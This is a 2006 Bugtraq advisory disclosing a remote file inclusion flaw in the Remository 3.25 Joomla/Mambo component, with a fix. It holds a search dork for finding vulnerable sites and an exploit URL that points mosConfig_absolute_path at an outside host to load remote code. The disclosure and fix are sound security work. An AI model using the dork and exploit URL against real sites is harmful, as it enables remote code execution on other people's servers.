Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability
From: camino@xxxxxxxxxxxxx
Date: 10 Aug 2006 10:21:42 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

 
    .:[ insecurity research team ]:.
     .__..____.:.______.____.:.____ .
 .:. |  |/    \:/  ___// __ \:/   _\.:.
   : |  |   |  \\____\\  ___/\   /__ :. .
 ..: |__|___|  /____  >\___  >\___  >.:
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:
 .   ...:.    .advisory.    .:...
         :..................: o9.o8.2oo6 ..
 
 
  Affected Application: Remository v3.25 

       (Mambo/Joomla CMS Component)
 
 
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  Discoverd by: camino
 
  Team: Insecurity Research Team
 
  URL: http://www.insecurityresearch.org
 
  E-Mail: camino@xxxxxxxxxxxxx
 
 
 
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
  Typ: Remote [x]  Local [ ]
 
       Remote File Inclusion [x]  SQL Injection [ ]
 
  Level: Low [ ]  Middle [x]  High [ ]
 
  Application: Remository
 
  Version: 3.25
 
  Vulnerable File: admin.remository.php
 
  URL: http://www.remository.com
 
  Description: It's a component that works with Mambo CMS 4.5+ to 

               provide a selection of files that users can download. 
 
  Dork: intext:"Remository 3.25. is technology by Black Sheep Research"

        inurl:"com_remository"
 
 
 
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  http://[sitepath]/[joomlapath]/administrator/components/

  com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?
 
 
 
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  o1.) open admin.remository.php
 
  o2.) take a look at line 16:

       require_once ($mosConfig_absolute_path.'/components/

       com_remository/com_remository_constants.php');
 
  o3.) take a look at line 19:

       defined( '_VALID_MOS' ) or die( 'Direct Access to this location 
 
       is not allowed.' );
 
  o4.) exchange line 19 with line 16!
 
 
 
 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  brOmstar and all the sexy members of insecurity research team ;-)

Prev by Date: Re: SYM06-013 Symantec On-Demand Protection Encrypted Data Exposure
Next by Date: Netgear FVG318 is vunerable to DOS attack
Previous by thread: [ GLSA 200608-16 ] Warzone 2100 Resurrection: Multiple buffer overflows
Next by thread: Netgear FVG318 is vunerable to DOS attack
Index(es):
- Date
- Thread